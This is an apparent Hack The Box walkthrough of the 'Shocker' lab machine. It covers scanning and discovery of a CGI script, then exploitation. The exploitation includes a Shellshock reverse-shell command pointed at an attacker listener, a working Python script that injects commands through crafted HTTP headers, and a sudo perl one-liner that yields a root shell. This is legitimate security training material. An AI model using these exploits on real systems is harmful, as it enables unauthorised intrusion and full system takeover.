Hack The Box - Shocker Writeup


Nmap

nmap -sC -sV -oA nmap -v 10.10.10.56

Output

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-21 16:04 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:04
Completed Parallel DNS resolution of 1 host. at 16:04, 0.01s elapsed
Initiating Connect Scan at 16:04
Scanning 10.10.10.56 [1000 ports]
Discovered open port 80/tcp on 10.10.10.56
Discovered open port 2222/tcp on 10.10.10.56
Completed Connect Scan at 16:04, 0.42s elapsed (1000 total ports)
Initiating Service scan at 16:04
Scanning 2 services on 10.10.10.56
Completed Service scan at 16:04, 6.05s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.56.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.89s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.11s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Nmap scan report for 10.10.10.56
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Initiating NSE at 16:04
Completed NSE at 16:04, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

From the scan we see the following services:

Port   Service
80     HTTP (Apache httpd 2.4.18)
2222   SSH (OpenSSH 7.2p2)

Note that SSH is listening on the non-standard port 2222 rather than 22.

HTTP

Taking a look at the HTTP server first, we find a basic page. The page source doesn't reveal anything of interest.

Dirbuster

Using DirBuster with a standard wordlist we find a /cgi-bin/ folder. Given that the box is called Shocker, and that Apache's mod_cgi passes request headers to CGI scripts as environment variables, Shellshock (CVE-2014-6271) is the obvious attack to try.

Running DirBuster again against /cgi-bin/, this time fuzzing for files with the sh, cgi and pl extensions, we find a user.sh script after a few seconds.

Shellshock Exploit

The exploit for this box is the well known Apache mod_cgi - 'Shellshock' Remote Command Injection PoC (Exploit-DB 34900). It works because Apache exports request headers such as User-Agent into the CGI script's environment, and a vulnerable bash executes whatever follows a crafted function definition (() { :; };) in any environment variable it imports, before the script itself runs.

The syntax for executing the PoC is: python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.16 lport=4555 pages=/cgi-bin/user.sh

  • payload Either reverse (the target connects back to us) or bind (the target opens a listening port)
  • rhost The IP/hostname of the target server
  • lhost The IP of our attacking machine, where our listener waits
  • lport The port used for the shell; for a reverse shell this is the port our listener is waiting on
  • pages The path to the vulnerable CGI script on the target

Executing this immediately gives us a shell as the user shelly, the account the CGI script runs as, and the user flag can be read from /home/shelly/user.txt
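To show what 34900.py does under the hood, here is a hand-rolled version of the same request as an added example (it is not the PoC's code and not anything from the box): it builds the crafted User-Agent header, explains why the Content-Type/blank-line prefix is needed to avoid a 500 from Apache, and separates our command output from the script's own output. The host and CGI path are the ones used in this writeup; the marker strings and the non-destructive probe are my own assumptions.

```python
"""Hand-rolled Shellshock (CVE-2014-6271) request against an Apache mod_cgi script.

Added example for this writeup; it is not the Exploit-DB 34900.py PoC used
above.  The host 10.10.10.56 and the path /cgi-bin/user.sh come from the
writeup; the marker strings and the probe command are assumptions made here.
Nothing touches the network unless the __main__ block runs.
"""
import http.client
import re
import shlex

# Arbitrary markers (chosen for this example) that bracket the command
# output so it can be separated from whatever user.sh prints itself.
BEGIN = "__SS_BEGIN__"
END = "__SS_END__"


def build_shellshock_header(command: str) -> str:
    """Return a header value that a vulnerable bash executes on import.

    Apache exports request headers to the CGI process as environment
    variables (User-Agent becomes HTTP_USER_AGENT).  A vulnerable bash
    treats a value that starts with "() {" as an exported function and,
    because of CVE-2014-6271, keeps executing whatever follows the closing
    brace, before the first line of user.sh itself runs.

    A CGI response must begin with a header block and a blank line, else
    Apache answers 500 "malformed header from script".  The injected
    command therefore prints a Content-Type header and an empty line first.
    """
    wrapped = f"echo {BEGIN}; {command}; echo {END}"
    return (
        "() { :; }; echo Content-Type: text/plain; echo; "
        f"/bin/bash -c {shlex.quote(wrapped)}"
    )


def extract_command_output(body: str):
    """Return the text between the markers, or None if the command did not run.

    Our injected header block already terminated the HTTP headers, so the
    script's normal output (including any header line it prints itself)
    lands in the body after the END marker and is discarded here.
    """
    pattern = re.escape(BEGIN) + r"\n(.*?)\n?" + re.escape(END)
    match = re.search(pattern, body, re.S)
    return match.group(1) if match else None


def run_via_shellshock(rhost, page, command, port=80, header="User-Agent", timeout=10):
    """Send one crafted GET and return (status, command output or None).

    Referer or Cookie work just as well as User-Agent: any header that
    Apache turns into an HTTP_* environment variable is an injection point.
    """
    conn = http.client.HTTPConnection(rhost, port, timeout=timeout)
    try:
        conn.request("GET", page, headers={header: build_shellshock_header(command)})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        return resp.status, extract_command_output(body)
    finally:
        conn.close()


def is_vulnerable(rhost, page, port=80):
    """Non-destructive check: does a harmless echo come back between the markers?"""
    _, output = run_via_shellshock(rhost, page, "echo shellshock", port=port)
    return output is not None and "shellshock" in output


if __name__ == "__main__":
    TARGET, PAGE = "10.10.10.56", "/cgi-bin/user.sh"
    if is_vulnerable(TARGET, PAGE):
        status, out = run_via_shellshock(TARGET, PAGE, "id; uname -a")
        print(f"HTTP {status}\n{out}")
    else:
        print("target did not execute the injected function body")
```

Probing with a plain echo before launching the reverse shell confirms both that bash is vulnerable and that the Content-Type prefix is accepted by this Apache; if the probe returns a 500 or no markers, the header is being exported but the response framing is wrong, and fixing that is cheaper than debugging a silent reverse shell.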

Privilege Escalation

Now that we have a shell as a user, our task is to escalate our privileges to root. Running sudo -l shows that we are allowed to run /usr/bin/perl as root without a password.

This is easily exploited because perl can execute other programs, and sudo runs it as root without dropping privileges. Running sudo /usr/bin/perl -e 'exec "/bin/bash";' gives us a bash session as root, and the root flag can be read from /root/root.txt